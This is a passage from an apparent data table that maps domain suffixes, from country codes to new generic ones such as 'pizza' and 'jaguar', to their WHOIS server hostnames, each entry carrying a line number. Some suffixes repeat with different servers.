guru:whois.comlaude.com 1040 | nom.co:whois.nic.co 1041 | info.hu:whois.nic.hu 1042 | de:whois.denic.de 1043 | agrar.hu:whois.nic.hu 1044 | aland.fi:whois.fi 1045 | mus.br:whois.nic.br 1046 | fie.ee:whois.tld.ee 1047 | ac.ug:whois.co.ug 1048 | ntr.br:whois.nic.br 1049 | villas:whois.name.com 1050 | ac.il:whois.isoc.org.il 1051 | ac.im:whois.nic.im 1052 | ac.in:whois.inregistry.net 1053 | ac.id:whois.pandi.or.id 1054 | presse.fr:whois.nic.fr 1055 | ac.ir:whois.nic.ir 1056 | industries:whois.comlaude.com 1057 | net.cd:whois.nic.cd 1058 | la:whois2.afilias-grs.net 1059 | net.ch:whois.nic.ch 1060 | net.cn:whois.cnnic.net.cn 1061 | li:whois.nic.li 1062 | lv:whois.nic.lv 1063 | lt:whois.domreg.lt 1064 | lu:whois.restena.lu 1065 | holiday:whois.comlaude.com 1066 | auto:whois.donuts.co 1067 | shop.hu:whois.nic.hu 1068 | bar:whois.nic.bar 1069 | go.th:whois.thnic.net 1070 | university:whois.comlaude.com 1071 | vic.au:whois.aunic.net 1072 | trd.br:whois.nic.br 1073 | boutique:whois.comlaude.com 1074 | arq.br:whois.nic.br 1075 | red:whois.donuts.co 1076 | eco:whois.donuts.co 1077 | org.ng:whois.nic.net.ng 1078 | vacations:whois.uniregistrar.com 1079 | org.nz:whois.srs.net.nz 1080 | co.gg:whois.gg 1081 | com.om:whois.registry.om 1082 | ac.uk:whois.ja.net 1083 | gov.lt:whois.domreg.lt 1084 | gov.lu:whois.restena.lu 1085 | gov.lv:whois.nic.lv 1086 | ar.us:whois.nic.us 1087 | gov.li:whois.nic.li 1088 | or.tz:whois.tznic.or.tz 1089 | art:whois.donuts.co 1090 | sci.eg:whois.ripe.net 1091 | edu.ac:whois.nic.ac 1092 | management:whois.donuts.co 1093 | edu.af:whois.nic.af 1094 | org.il:whois.isoc.org.il 1095 | id.lv:whois.nic.lv 1096 | tx.us:whois.nic.us 1097 | edu.az:whois.ripe.net 1098 | nls.uk:whois.nic.uk 1099 | com.eg:whois.ripe.net 1100 | academy:whois.donuts.co 1101 | jl.cn:whois.cnnic.net.cn 1102 | bet:whois.donuts.co 1103 | gov.br:whois.nic.br 1104 | store.ro:whois.rotld.ro 1105 | agency:whois.donuts.co 1106 | gov.by:whois.cctld.by 1107 | sh:whois.nic.sh 1108 | gov.bo:whois.nic.bo 1109 | gd.cn:whois.cnnic.net.cn 1110 | accountants:whois.donuts.co 1111 | hiphop:whois.uniregistry.net 1112 | co.at:whois.nic.at 1113 | nm.us:whois.nic.us 1114 | org.pf:whois.registry.pf 1115 | gob.es:whois.nic.es 1116 | edu.pr:whois.nic.pr 1117 | schule:whois.donuts.co 1118 | jx.cn:whois.cnnic.net.cn 1119 | bio.br:whois.nic.br 1120 | fhs.no:whois.norid.no 1121 | pro.cy:whois.ripe.net 1122 | prd.mg:whois.nic.mg 1123 | partners:whois.comlaude.com 1124 | edu.pf:whois.registry.pf 1125 | net.tr:whois.nic.tr 1126 | photography:whois.udag.net 1127 | gov.pl:whois.dns.pl 1128 | gov.pr:whois.nic.pr 1129 | net.th:whois.thnic.net 1130 | intl.tn:whois.ati.tn 1131 | qa:whois.registry.qa 1132 | mil.ge:whois.ripe.net 1133 | org.om:whois.registry.om 1134 | computer:whois.donuts.co 1135 | or.id:whois.pandi.or.id 1136 | gs.cn:whois.cnnic.net.cn 1137 | email:whois.uniregistrar.com 1138 | utazas.hu:whois.nic.hu 1139 | ac.nz:whois.srs.net.nz 1140 | inima.al:whois.ripe.net 1141 | fin.tn:whois.ati.tn 1142 | priv.at:whois.nic.at 1143 | net.bo:whois.nic.bo 1144 | xj.cn:whois.cnnic.net.cn 1145 | net.bz:whois.belizenic.bz 1146 | ci:whois.nic.ci 1147 | ch:whois.nic.ch 1148 | co:whois.nic.co 1149 | cn:whois.cnnic.net.cn 1150 | cl:whois.nic.cl 1151 | cc:whois.enom.com 1152 | cf:whois.dot.cf 1153 | cd:whois.nic.cd 1154 | cz:whois.nic.cz 1155 | cy:whois.ripe.net 1156 | cx:whois.nic.cx 1157 | org.ag:whois.nic.ag 1158 | sarl:whois.donuts.co 1159 | org.al:whois.ripe.net 1160 | int.ru:whois.tcinet.ru 1161 | org.au:whois.aunic.net 1162 | tirana.al:whois.ripe.net 1163 | com.mx:whois.nic.mx 1164 | com.mt:whois.ripe.net 1165 | ha.cn:whois.cnnic.net.cn 1166 | com.mk:whois.ripe.net 1167 | graphics:whois.donuts.co 1168 | com.mg:whois.nic.mg 1169 | net.cy:whois.ripe.net 1170 | ri.us:whois.nic.us 1171 | eus:whois.nic.eus 1172 | pictures:whois.comlaude.com 1173 | info.au:whois.aunic.net 1174 | vc:whois2.afilias-grs.net 1175 | ve:whois.nic.ve 1176 | vg:ccwhois.ksregistry.net 1177 | site:whois.donuts.co 1178 | vu:vunic.vu 1179 | ltd.cy:whois.ripe.net 1180 | ad.jp:whois.jprs.jp 1181 | med.ec:whois.nic.ec 1182 | film:whois.donuts.co 1183 | idf.il:whois.isoc.org.il 1184 | gob.bo:whois.nic.bo 1185 | edu.om:whois.registry.om 1186 | erotika.hu:whois.nic.hu 1187 | gov.mt:whois.ripe.net 1188 | name.hr:whois.dns.hr 1189 | yoga:whois.donuts.co 1190 | gov.ma:whois.iam.net.ma 1191 | gov.mg:whois.nic.mg 1192 | insure:whois.donuts.co 1193 | asso.fr:whois.nic.fr 1194 | edu.ng:whois.nic.net.ng 1195 | nt.au:whois.aunic.net 1196 | erotica.hu:whois.nic.hu 1197 | audio:whois.donuts.co 1198 | de.us:whois.nic.us 1199 | net.sb:whois.nic.net.sb 1200 | net.sc:whois2.afilias-grs.net 1201 | clinic:whois.donuts.co 1202 | net.sa:saudinic.net.sa 1203 | fj.cn:whois.cnnic.net.cn 1204 | cim.br:whois.nic.br 1205 | nom.es:whois.nic.es 1206 | pa.us:whois.nic.us 1207 | media.hu:whois.nic.hu 1208 | ski:whois.donuts.co 1209 | parliament.cy:whois.ripe.net 1210 | nic.uk:whois.nic.uk 1211 | shop.ht:whois.nic.ht 1212 | gob.pe:kero.yachay.pe 1213 | haus:whois.donuts.co 1214 | press:whois.nic.press 1215 | gov.cx:whois.nic.cx 1216 | fst.br:whois.nic.br 1217 | web.ve:whois.nic.ve 1218 | gov.co:whois.nic.co 1219 | works:whois.name.com 1220 | off.ai:whois.ai 1221 | fl.us:whois.nic.us 1222 | net.al:whois.ripe.net 1223 | in.us:whois.nic.us 1224 | net.ai:whois.ai 1225 | pri.ee:whois.tld.ee 1226 | net.ae:whois.aeda.net.ae 1227 | gen.nz:whois.srs.net.nz 1228 | net.ag:whois.nic.ag 1229 | net.az:whois.ripe.net 1230 | hi.cn:whois.cnnic.net.cn 1231 | net.au:whois.aunic.net 1232 | host:whois.nic.host 1233 | vgs.no:whois.norid.no 1234 | org.ai:whois.ai 1235 | mil.pl :whois.dns.pl 1236 | ac.yu:whois.ripe.net 1237 | holdings:whois.donuts.co 1238 | software:whois.donuts.co 1239 | go.tz:whois.tznic.or.tz 1240 | com.li:whois.nic.li 1241 | museum:whois.museum 1242 | komforb.se:whois.nic-se.se 1243 | cricket:whois.donuts.co 1244 | buy:whois.donuts.co 1245 | org.pr:whois.nic.pr 1246 | hr:whois.dns.hr 1247 | net.om:whois.registry.om 1248 | ht:whois.nic.ht 1249 | hu:whois.nic.hu 1250 | delivery:whois.donuts.co 1251 | hk:whois.hknic.net.hk 1252 | construction:whois.donuts.co 1253 | hn:whois2.afilias-grs.net 1254 | hm:whois.registry.hm 1255 | org.pl:whois.dns.pl 1256 | sex.hu:whois.nic.hu 1257 | hosting:whois.donuts.co 1258 | ms.us:whois.nic.us 1259 | pl:whois.dns.pl 1260 | pro.pr:whois.nic.pr 1261 | pm:whois.nic.pm 1262 | tm.cy:whois.ripe.net 1263 | ink:whois.centralnic.com 1264 | fm.br:whois.nic.br 1265 | book:whois.donuts.co 1266 | xxx:whois.nic.xxx 1267 | conf.au:whois.aunic.net 1268 | cq.cn:whois.cnnic.net.cn 1269 | enterprises:whois.comlaude.com 1270 | british-library.uk:whois.nic.uk 1271 | org.bo:whois.nic.bo 1272 | org.br:whois.nic.br 1273 | from.hr:whois.dns.hr 1274 | org.bw:whois.nic.net.bw 1275 | bike:whois.donuts.co 1276 | school:whois.donuts.co 1277 | mu:whois.nic.mu 1278 | pizza:whois.donuts.co 1279 | plumbing:whois.donuts.co 1280 | wine:whois.donuts.co 1281 | salon:whois.donuts.co 1282 | isla.pr:whois.nic.pr 1283 | london:whois.nic.london 1284 | ne.us:whois.nic.us 1285 | adm.br:whois.nic.br 1286 | ne.ug:whois.co.ug 1287 | or.th:whois.thnic.net 1288 | coffee:whois.donuts.co 1289 | brand.se:whois.nic-se.se 1290 | bolt.hu:whois.nic.hu 1291 | band:whois.donuts.co 1292 | id.au:whois.aunic.net 1293 | rocks:whois.donuts.co 1294 | fitness:whois.donuts.co 1295 | edu.lv:whois.nic.lv 1296 | nv.us:whois.nic.us 1297 | mil.bo:whois.nic.bo 1298 | trading:whois.donuts.co 1299 | mil.br:whois.nic.br 1300 | fh.se:whois.nic-se.se 1301 | ggf.br:whois.nic.br 1302 | mil.by:whois.cctld.by 1303 | ru:whois.tcinet.ru 1304 | network:whois.donuts.co 1305 | rs:whois.rnids.rs 1306 | re:whois.nic.re 1307 | gov:whois.nic.gov 1308 | foundation:whois.donuts.co 1309 | free:whois.donuts.co 1310 | gov.az:whois.ripe.net 1311 | not.br:whois.nic.br 1312 | gov.af:whois.nic.af 1313 | gov.ae:whois.aeda.net.ae 1314 | gov.ac:whois.nic.ac 1315 | edu.al:whois.ripe.net 1316 | basketball:whois.donuts.co 1317 | gr.jp:whois.jprs.jp 1318 | stat.no:whois.norid.no 1319 | press.cy:whois.ripe.net 1320 | top:whois.nic.top 1321 | dog:whois.donuts.co 1322 | tips:whois.donuts.co 1323 | fail:whois.donuts.co 1324 | life:whois.donuts.co 1325 | catering:whois.donuts.co 1326 | ventures:whois.donuts.co 1327 | dental:whois.donuts.co 1328 | digital:whois.donuts.co 1329 | zone:whois.donuts.co 1330 | coop:whois.nic.coop 1331 | cool:whois.donuts.co 1332 | dating:whois.donuts.co 1333 | team:whois.donuts.co 1334 | international:whois.donuts.co 1335 | edu.yu:whois.ripe.net 1336 | cab:whois.donuts.co 1337 | group:whois.donuts.co 1338 | now:whois.donuts.co 1339 | mil.lv:whois.nic.lv 1340 | equipment:whois.donuts.co 1341 | vision:whois.donuts.co 1342 | com.tr:whois.nic.tr 1343 | cash:whois.donuts.co 1344 | technology:whois.donuts.co 1345 | taxi:whois.donuts.co 1346 | furniture:whois.donuts.co 1347 | oh.us:whois.nic.us 1348 | org.ir:whois.nic.ir 1349 | storage:whois.donuts.co 1350 | pics:whois.uniregistry.net 1351 | company:whois.donuts.co 1352 | rentals:whois.donuts.co 1353 | systems:whois.donuts.co 1354 | house:whois.donuts.co 1355 | org.kz:whois.nic.kz 1356 | golf:whois.donuts.co 1357 | gold:whois.donuts.co 1358 | express:whois.donuts.co 1359 | community:whois.donuts.co 1360 | pe:kero.yachay.pe 1361 | fund:whois.donuts.co 1362 | repair:whois.donuts.co 1363 | cafe:whois.donuts.co 1364 | land:whois.donuts.co 1365 | capital:whois.donuts.co 1366 | limo:whois.donuts.co 1367 | tools:whois.donuts.co 1368 | camera:whois.donuts.co 1369 | com.pe:kero.yachay.pe 1370 | farm:whois.donuts.co 1371 | healthcare:whois.donuts.co 1372 | recipes:whois.donuts.co 1373 | ltd:whois.donuts.co 1374 | gallery:whois.donuts.co 1375 | va:whois.ripe.net 1376 | education:whois.donuts.co 1377 | parts:whois.donuts.co 1378 | center:whois.donuts.co 1379 | org.pe:kero.yachay.pe 1380 | fyi:whois.donuts.co 1381 | loans:whois.donuts.co 1382 | com.lv:whois.nic.lv 1383 | aarp:whois.nic.aarp 1384 | abarth:whois.afilias-srs.net 1385 | abbott:whois.afilias-srs.net 1386 | abbvie:whois.afilias-srs.net 1387 | abc:whois.nic.abc 1388 | abogado:whois.nic.abogado 1389 | abudhabi:whois.nic.abudhabi 1390 | ac:whois.nic.ac 1391 | academy:whois.donuts.co 1392 | accountant:whois.nic.accountant 1393 | accountants:whois.donuts.co 1394 | aco:whois.afilias-srs.net 1395 | active:whois.afilias-srs.net 1396 | actor:whois.unitedtld.com 1397 | adac:whois.nic.adac 1398 | ads:whois.nic.google 1399 | adult:whois.afilias-srs.net 1400 | ae:whois.aeda.net.ae 1401 | aeg:whois.nic.aeg 1402 | aero:whois.aero 1403 | af:whois.nic.af 1404 | afamilycompany:whois.nic.afamilycompany 1405 | afl:whois.nic.afl 1406 | africa:africa-whois.registry.net.za 1407 | ag:whois.nic.ag 1408 | agakhan:whois.afilias-srs.net 1409 | agency:whois.donuts.co 1410 | ai:whois.ai 1411 | aigo:whois.afilias-srs.net 1412 | airbus:whois.nic.airbus 1413 | airforce:whois.unitedtld.com 1414 | airtel:whois.nic.airtel 1415 | akdn:whois.afilias-srs.net 1416 | alfaromeo:whois.afilias-srs.net 1417 | alibaba:whois.afilias-srs.net 1418 | alipay:whois.afilias-srs.net 1419 | allfinanz:whois.ksregistry.net 1420 | allstate:whois.afilias-srs.net 1421 | ally:whois.afilias-srs.net 1422 | alsace:whois-alsace.nic.fr 1423 | alstom:whois.nic.alstom 1424 | am:whois.amnic.net 1425 | americanfamily:whois.nic.americanfamily 1426 | amfam:whois.nic.amfam 1427 | android:whois.nic.google 1428 | anquan:whois.teleinfo.cn 1429 | anz:whois.nic.anz 1430 | aol:whois.nic.aol 1431 | apartments:whois.donuts.co 1432 | app:whois.nic.google 1433 | apple:whois.afilias-srs.net 1434 | aquarelle:whois-aquarelle.nic.fr 1435 | ar:whois.nic.ar 1436 | archi:whois.afilias.net 1437 | army:whois.rightside.co 1438 | arpa:whois.iana.org 1439 | art:whois.nic.art 1440 | arte:whois.nic.arte 1441 | as:whois.nic.as 1442 | asda:whois.nic.asda 1443 | asia:whois.nic.asia 1444 | associates:whois.donuts.co 1445 | at:whois.nic.at 1446 | attorney:whois.rightside.co 1447 | au:whois.audns.net.au 1448 | auction:whois.unitedtld.com 1449 | audi:whois.afilias-srs.net 1450 | audio:whois.uniregistry.net 1451 | auspost:whois.nic.auspost 1452 | auto:whois.uniregistry.net 1453 | autos:whois.afilias-srs.net 1454 | avianca:whois.afilias-srs.net 1455 | aw:whois.nic.aw 1456 | ax:whois.ax 1457 | baidu:whois.ngtld.cn 1458 | band:whois.rightside.co 1459 | bank:whois.nic.bank 1460 | bar:whois.nic.bar 1461 | barcelona:whois.nic.barcelona 1462 | barclaycard:whois.nic.barclaycard 1463 | barclays:whois.nic.barclays 1464 | barefoot:whois.nic.barefoot 1465 | bargains:whois.donuts.co 1466 | basketball:whois.nic.basketball 1467 | bauhaus:whois.nic.bauhaus 1468 | bayern:whois.nic.bayern 1469 | bbc:whois.nic.bbc 1470 | bbt:whois.nic.bbt 1471 | bbva:whois.nic.bbva 1472 | bcg:whois.afilias-srs.net 1473 | bcn:whois.nic.bcn 1474 | be:whois.dns.be 1475 | beats:whois.afilias-srs.net 1476 | beauty:whois.nic.beauty 1477 | beer:whois.nic.beer 1478 | bentley:whois.nic.bentley 1479 | berlin:whois.nic.berlin 1480 | best:whois.nic.best 1481 | bestbuy:whois.afilias-srs.net 1482 | bet:whois.afilias.net 1483 | bg:whois.register.bg 1484 | bi:whois1.nic.bi 1485 | bid:whois.nic.bid 1486 | bike:whois.donuts.co 1487 | bingo:whois.donuts.co 1488 | bio:whois.afilias.net 1489 | biz:whois.biz 1490 | bj:whois.nic.bj 1491 | black:whois.afilias.net 1492 | blackfriday:whois.uniregistry.net 1493 | blanco:whois.nic.blanco 1494 | blockbuster:whois.afilias-srs.net 1495 | blog:whois.nic.blog 1496 | blue:whois.afilias.net 1497 | bms:whois.nic.bms 1498 | bmw:whois.ksregistry.net 1499 | bn:whois.bnnic.bn 1500 | bnl:whois.afilias-srs.net 1501 | bnpparibas:whois.afilias-srs.net 1502 | bo:whois.nic.bo 1503 | boats:whois.afilias-srs.net 1504 | boehringer:whois.afilias-srs.net 1505 | bofa:whois.nic.bofa 1506 | bom:whois.gtlds.nic.br 1507 | bond:whois.nic.bond 1508 | boo:whois.nic.google 1509 | boots:whois.nic.boots 1510 | bosch:whois.nic.bosch 1511 | bostik:whois-bostik.nic.fr 1512 | boston:whois.nic.boston 1513 | boutique:whois.donuts.co 1514 | box:whois.aridnrs.net.au 1515 | br:whois.registro.br 1516 | bradesco:whois.nic.bradesco 1517 | bridgestone:whois.nic.bridgestone 1518 | broadway:whois.nic.broadway 1519 | broker:whois.nic.broker 1520 | brother:whois.nic.brother 1521 | brussels:whois.nic.brussels 1522 | budapest:whois.nic.budapest 1523 | bugatti:whois.afilias-srs.net 1524 | build:whois.nic.build 1525 | builders:whois.donuts.co 1526 | business:whois.donuts.co 1527 | buy:whois.afilias-srs.net 1528 | bw:whois.nic.net.bw 1529 | by:whois.cctld.by 1530 | bzh:whois.nic.bzh 1531 | ca:whois.cira.ca 1532 | cab:whois.donuts.co 1533 | cafe:whois.donuts.co 1534 | cal:whois.nic.google 1535 | cam:whois.ksregistry.net 1536 | camera:whois.donuts.co 1537 | camp:whois.donuts.co 1538 | cancerresearch:whois.nic.cancerresearch 1539 | canon:whois.nic.canon 1540 | capetown:capetown-whois.registry.net.za 1541 | capital:whois.donuts.co 1542 | capitalone:whois.nic.capitalone 1543 | car:whois.uniregistry.net 1544 | cards:whois.donuts.co 1545 | care:whois.donuts.co 1546 | career:whois.nic.career 1547 | careers:whois.donuts.co 1548 | cars:whois.uniregistry.net 1549 | casa:whois.nic.casa 1550 | case:whois.afilias-srs.net 1551 | caseih:whois.afilias-srs.net 1552 | cash:whois.donuts.co 1553 | casino:whois.donuts.co 1554 | cat:whois.nic.cat 1555 | catering:whois.donuts.co 1556 | catholic:whois.aridnrs.net.au 1557 | cba:whois.nic.cba 1558 | cbs:whois.afilias-srs.net 1559 | cc:ccwhois.verisign-grs.com 1560 | ceb:whois.afilias-srs.net 1561 | center:whois.donuts.co 1562 | ceo:whois.nic.ceo 1563 | cern:whois.afilias-srs.net 1564 | cf:whois.dot.cf 1565 | cfa:whois.nic.cfa 1566 | cfd:whois.nic.cfd 1567 | ch:whois.nic.ch 1568 | chanel:whois.nic.chanel 1569 | channel:whois.nic.google 1570 | chat:whois.donuts.co 1571 | cheap:whois.donuts.co 1572 | chintai:whois.nic.chintai 1573 | christmas:whois.uniregistry.net 1574 | chrome:whois.nic.google 1575 | chrysler:whois.afilias-srs.net 1576 | church:whois.donuts.co 1577 | ci:whois.nic.ci 1578 | cipriani:whois.afilias-srs.net 1579 | city:whois.donuts.co 1580 | cityeats:whois.nic.cityeats 1581 | cl:whois.nic.cl 1582 | claims:whois.donuts.co 1583 | cleaning:whois.donuts.co 1584 | click:whois.uniregistry.net 1585 | clinic:whois.donuts.co 1586 | clinique:whois.afilias-srs.net 1587 | clothing:whois.donuts.co 1588 | cloud:whois.nic.cloud 1589 | club:whois.nic.club 1590 | clubmed:whois.nic.clubmed 1591 | cn:whois.cnnic.cn 1592 | co:whois.nic.co 1593 | coach:whois.donuts.co 1594 | codes:whois.donuts.co 1595 | coffee:whois.donuts.co 1596 | college:whois.nic.college 1597 | cologne:whois-fe1.pdt.cologne.tango.knipp.de 1598 | com:whois.verisign-grs.com 1599 | comcast:whois.nic.comcast 1600 | commbank:whois.nic.commbank 1601 | community:whois.donuts.co 1602 | company:whois.donuts.co 1603 | compare:whois.nic.compare 1604 | computer:whois.donuts.co 1605 | comsec:whois.nic.comsec 1606 | condos:whois.donuts.co 1607 | construction:whois.donuts.co 1608 | consulting:whois.unitedtld.com 1609 | contact:whois.nic.contact 1610 | contractors:whois.donuts.co 1611 | cooking:whois.nic.cooking 1612 | cookingchannel:whois.nic.cookingchannel 1613 | cool:whois.donuts.co 1614 | coop:whois.nic.coop 1615 | corsica:whois-corsica.nic.fr 1616 | country:whois-dub.mm-registry.com 1617 | coupons:whois.donuts.co 1618 | courses:whois.aridnrs.net.au 1619 | cr:whois.nic.cr 1620 | credit:whois.donuts.co 1621 | creditcard:whois.donuts.co 1622 | creditunion:whois.afilias-srs.net 1623 | cricket:whois.nic.cricket 1624 | cruise:whois.afilias-srs.net 1625 | cruises:whois.donuts.co 1626 | csc:whois.nic.csc 1627 | cuisinella:whois.nic.cuisinella 1628 | cx:whois.nic.cx 1629 | cymru:whois.nic.cymru 1630 | cyou:whois.afilias-srs.net 1631 | cz:whois.nic.cz 1632 | dabur:whois.afilias-srs.net 1633 | dad:whois.nic.google 1634 | dance:whois.unitedtld.com 1635 | data:whois.afilias-srs.net 1636 | date:whois.nic.date 1637 | dating:whois.donuts.co 1638 | datsun:whois.nic.gmo 1639 | day:whois.nic.google 1640 | dclk:whois.nic.google 1641 | dds:whois.nic.dds 1642 | de:whois.denic.de 1643 | deals:whois.donuts.co 1644 | degree:whois.rightside.co 1645 | delivery:whois.donuts.co 1646 | deloitte:whois.nic.deloitte 1647 | delta:whois.afilias-srs.net 1648 | democrat:whois.unitedtld.com 1649 | dental:whois.donuts.co 1650 | dentist:whois.rightside.co 1651 | desi:whois.ksregistry.net 1652 | design:whois.nic.design 1653 | dev:whois.nic.google 1654 | diamonds:whois.donuts.co 1655 | diet:whois.uniregistry.net 1656 | digital:whois.donuts.co 1657 | direct:whois.donuts.co 1658 | directory:whois.donuts.co 1659 | discount:whois.donuts.co 1660 | dish:whois.afilias-srs.net 1661 | diy:whois.nic.diy 1662 | dk:whois.dk-hostmaster.dk 1663 | dm:whois.nic.dm 1664 | docs:whois.nic.google 1665 | doctor:whois.donuts.co 1666 | dodge:whois.afilias-srs.net 1667 | dog:whois.donuts.co 1668 | doha:whois.nic.doha 1669 | domains:whois.donuts.co 1670 | dot:whois.afilias-srs.net 1671 | download:whois.nic.download 1672 | drive:whois.nic.google 1673 | dtv:whois.afilias-srs.net 1674 | dubai:whois.nic.dubai 1675 | duck:whois.nic.duck 1676 | dunlop:whois.afilias-srs.net 1677 | durban:durban-whois.registry.net.za 1678 | dvag:whois.ksregistry.net 1679 | dvr:whois.afilias-srs.net 1680 | dz:whois.nic.dz 1681 | eat:whois.nic.google 1682 | ec:whois.nic.ec 1683 | eco:whois.afilias-srs.net 1684 | edeka:whois.afilias-srs.net 1685 | edu:whois.educause.edu 1686 | education:whois.donuts.co 1687 | ee:whois.tld.ee 1688 | email:whois.donuts.co 1689 | emerck:whois.afilias-srs.net 1690 | energy:whois.donuts.co 1691 | engineer:whois.rightside.co 1692 | engineering:whois.donuts.co 1693 | enterprises:whois.donuts.co 1694 | epson:whois.aridnrs.net.au 1695 | equipment:whois.donuts.co 1696 | ericsson:whois.nic.ericsson 1697 | erni:whois.nic.erni 1698 | es:whois.nic.es 1699 | esq:whois.nic.google 1700 | estate:whois.donuts.co 1701 | esurance:whois.afilias-srs.net 1702 | eu:whois.eu 1703 | eurovision:whois.nic.eurovision 1704 | eus:whois.eus.coreregistry.net 1705 | events:whois.donuts.co 1706 | exchange:whois.donuts.co 1707 | expert:whois.donuts.co 1708 | exposed:whois.donuts.co 1709 | express:whois.donuts.co 1710 | extraspace:whois.afilias-srs.net 1711 | fage:whois.afilias-srs.net 1712 | fail:whois.donuts.co 1713 | fairwinds:whois.nic.fairwinds 1714 | faith:whois.nic.faith 1715 | family:whois.rightside.co 1716 | fan:whois.nic.fan 1717 | fans:whois.nic.fans 1718 | farm:whois.donuts.co 1719 | fashion:whois.nic.fashion 1720 | fedex:whois.afilias-srs.net 1721 | feedback:whois.nic.feedback 1722 | ferrari:whois.afilias-srs.net 1723 | fi:whois.fi 1724 | fiat:whois.afilias-srs.net 1725 | fidelity:whois.nic.fidelity 1726 | fido:whois.afilias-srs.net 1727 | film:whois.nic.film 1728 | final:whois.gtlds.nic.br 1729 | finance:whois.donuts.co 1730 | financial:whois.donuts.co 1731 | firestone:whois.nic.firestone 1732 | firmdale:whois.nic.firmdale 1733 | fish:whois.donuts.co 1734 | fishing:whois.nic.fishing 1735 | fit:whois.nic.fit 1736 | fitness:whois.donuts.co 1737 | flights:whois.donuts.co 1738 | florist:whois.donuts.co 1739 | flowers:whois.uniregistry.net 1740 | fly:whois.nic.google 1741 | fo:whois.nic.fo 1742 | foo:whois.nic.google 1743 | foodnetwork:whois.nic.foodnetwork 1744 | football:whois.donuts.co 1745 | forex:whois.nic.forex 1746 | forsale:whois.unitedtld.com 1747 | forum:whois.nic.forum 1748 | foundation:whois.donuts.co 1749 | fr:whois.nic.fr 1750 | fresenius:whois.ksregistry.net 1751 | frl:whois.nic.frl 1752 | frogans:whois-frogans.nic.fr 1753 | frontdoor:whois.nic.frontdoor 1754 | fujitsu:whois.nic.gmo 1755 | fujixerox:whois.nic.fujixerox 1756 | fun:whois.nic.fun 1757 | fund:whois.donuts.co 1758 | furniture:whois.donuts.co 1759 | futbol:whois.unitedtld.com 1760 | fyi:whois.donuts.co 1761 | gal:whois.gal.coreregistry.net 1762 | gallery:whois.donuts.co 1763 | gallo:whois.nic.gallo 1764 | gallup:whois.afilias-srs.net 1765 | game:whois.uniregistry.net 1766 | games:whois.rightside.co 1767 | garden:whois.nic.garden 1768 | gbiz:whois.nic.google 1769 | gd:whois.nic.gd 1770 | gdn:whois.nic.gdn 1771 | gea:whois.afilias-srs.net 1772 | gent:whois.nic.gent 1773 | genting:whois.nic.genting 1774 | george:whois.nic.george 1775 | gf:whois.mediaserv.net 1776 | gg:whois.gg 1777 | ggee:whois.nic.ggee 1778 | gi:whois2.afilias-grs.net 1779 | gift:whois.uniregistry.net 1780 | gifts:whois.donuts.co 1781 | gives:whois.rightside.co 1782 | giving:whois.nic.giving 1783 | gl:whois.nic.gl 1784 | glade:whois.nic.glade 1785 | glass:whois.donuts.co 1786 | gle:whois.nic.google 1787 | global:whois.nic.global 1788 | globo:whois.gtlds.nic.br 1789 | gmail:whois.nic.google 1790 | gmbh:whois.donuts.co 1791 | gmx:whois-fe1.gmx.tango.knipp.de 1792 | godaddy:whois.afilias-srs.net 1793 | gold:whois.donuts.co 1794 | goldpoint:whois.nic.goldpoint 1795 | golf:whois.donuts.co 1796 | goo:whois.nic.gmo 1797 | goodhands:whois.afilias-srs.net 1798 | goodyear:whois.afilias-srs.net 1799 | goog:whois.nic.google 1800 | google:whois.nic.google 1801 | gop:whois.nic.gop 1802 | gov:whois.dotgov.gov 1803 | gq:whois.dominio.gq 1804 | graphics:whois.donuts.co 1805 | gratis:whois.donuts.co 1806 | green:whois.afilias.net 1807 | gripe:whois.donuts.co 1808 | group:whois.donuts.co 1809 | gs:whois.nic.gs 1810 | guge:whois.nic.google 1811 | guide:whois.donuts.co 1812 | guitars:whois.uniregistry.net 1813 | guru:whois.donuts.co 1814 | gy:whois.registry.gy 1815 | hamburg:whois.nic.hamburg 1816 | hangout:whois.nic.google 1817 | haus:whois.unitedtld.com 1818 | hdfc:whois.afilias-srs.net 1819 | hdfcbank:whois.afilias-srs.net 1820 | healthcare:whois.donuts.co 1821 | help:whois.uniregistry.net 1822 | helsinki:whois.afilias-srs.net 1823 | here:whois.nic.google 1824 | hermes:whois.afilias-srs.net 1825 | hgtv:whois.nic.hgtv 1826 | hiphop:whois.uniregistry.net 1827 | hisamitsu:whois.nic.gmo 1828 | hitachi:whois.nic.gmo 1829 | hiv:whois.uniregistry.net 1830 | hk:whois.hkirc.hk 1831 | hkt:whois.afilias-srs.net 1832 | hm:whois.registry.hm 1833 | hn:whois.nic.hn 1834 | hockey:whois.donuts.co 1835 | holdings:whois.donuts.co 1836 | holiday:whois.donuts.co 1837 | homedepot:whois.afilias-srs.net 1838 | homes:whois.afilias-srs.net 1839 | honda:whois.nic.honda 1840 | horse:whois.nic.horse 1841 | hospital:whois.donuts.co 1842 | host:whois.nic.host 1843 | hosting:whois.uniregistry.net 1844 | house:whois.donuts.co 1845 | how:whois.nic.google 1846 | hr:whois.dns.hr 1847 | ht:whois.nic.ht 1848 | hu:whois.nic.hu 1849 | hughes:whois.afilias-srs.net 1850 | hyundai:whois.nic.hyundai 1851 | ibm:whois.nic.ibm 1852 | icbc:whois.afilias-srs.net 1853 | ice:whois.nic.ice 1854 | icu:whois.nic.icu 1855 | id:whois.pandi.or.id 1856 | ie:whois.domainregistry.ie 1857 | ifm:whois.nic.ifm 1858 | ikano:whois.ikano.tld-box.at 1859 | il:whois.isoc.org.il 1860 | im:whois.nic.im 1861 | imamat:whois.afilias-srs.net 1862 | immo:whois.donuts.co 1863 | immobilien:whois.unitedtld.com 1864 | in:whois.inregistry.net 1865 | industries:whois.donuts.co 1866 | infiniti:whois.nic.gmo 1867 | info:whois.afilias.net 1868 | ing:whois.nic.google 1869 | ink:whois.nic.ink 1870 | institute:whois.donuts.co 1871 | insurance:whois.nic.insurance 1872 | insure:whois.donuts.co 1873 | int:whois.iana.org 1874 | international:whois.donuts.co 1875 | investments:whois.donuts.co 1876 | io:whois.nic.io 1877 | iq:whois.cmc.iq 1878 | ir:whois.nic.ir 1879 | irish:whois.donuts.co 1880 | is:whois.isnic.is 1881 | iselect:whois.nic.iselect 1882 | ismaili:whois.afilias-srs.net 1883 | ist:whois.afilias-srs.net 1884 | istanbul:whois.afilias-srs.net 1885 | it:whois.nic.it 1886 | itv:whois.afilias-srs.net 1887 | iveco:whois.afilias-srs.net 1888 | jaguar:whois.nic.jaguar 1889 | java:whois.nic.java 1890 | jcb:whois.nic.gmo 1891 | jcp:whois.afilias-srs.net 1892 | je:whois.je 1893 | jeep:whois.afilias-srs.net 1894 | jewelry:whois.donuts.co 1895 | jio:whois.afilias-srs.net 1896 | 